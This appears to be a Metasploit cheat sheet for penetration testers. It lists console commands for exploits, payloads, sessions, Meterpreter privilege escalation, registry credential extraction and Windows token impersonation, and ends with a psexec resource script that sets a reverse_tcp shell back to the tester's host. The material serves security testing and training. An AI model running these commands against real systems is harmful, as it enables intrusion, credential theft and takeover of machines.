Metasploit Framework (MSF)

The world’s most used penetration testing framework
Metasploit​
Start
Start db
msfdb start
or
systemctl start postgresql
Start metasploit framework console
msfconsole
Exploits
Select exploit
use <exploit>
Run exploit
run
or
exploit
Options
Show options
show options
Show advanced options
show advanced
Set option
set <option> <value>
Set option (global)
setg <option> <value>
Payloads
Show payloads
show payloads
Select payload
set payload <payload>
Sessions
Show sessions
sessions -h
Interact with session
sessions <number>
Send session to background
background
Meterpreter
The shell command will present you with a standard shell on the target system.
shell
Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.
getsystem
Encoders
Show encoders
show encoders
Select encoder
set encoder <encoder>
Misc
Search for exploits
search <term>
Go back
back
Display help
help
Get info about current context?
info
show auxiliary
Multi/handler
Just start listener
use exploit/multi/handler
Jobs
Start job in background
run -j
Show jobs
jobs
Post exploitation
This module suggests local meterpreter exploits that can be used.
use post/multi/recon/local_exploit_suggester
This module extracts the plain-text Windows user login password in Registry.
use post/windows/gather/credentials/windows_autologin
This module will login with the specified username/password and execute the supplied command as a hidden process.
use post/windows/manage/run_as
Meterpreter session
Upgrade shell to meterpreter shell
post/multi/manage/shell_to_meterpreter
Migrate to other (e.g. more stable) process
migrate
Get system info
sysinfo
Port forwarding
portfwd add -l <port> -r 127.0.0.1 -p <port>
Impersonation (Windows)
Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc.
whoami /priv
Load incognito module and list available tokens
load incognito
list_tokens -g
Impersonate e.g. BUILTIN\Administrators
impersonate_token "BUILTIN\Administrators"
Migrate to a process with the correct permission, to actually get the elevated permissions (token != permission).
ps 
migrate <pid>
Resource Scripts
Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.
msfconsole -r demo.rc
demo.rc
use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>

Last modified 1yr ago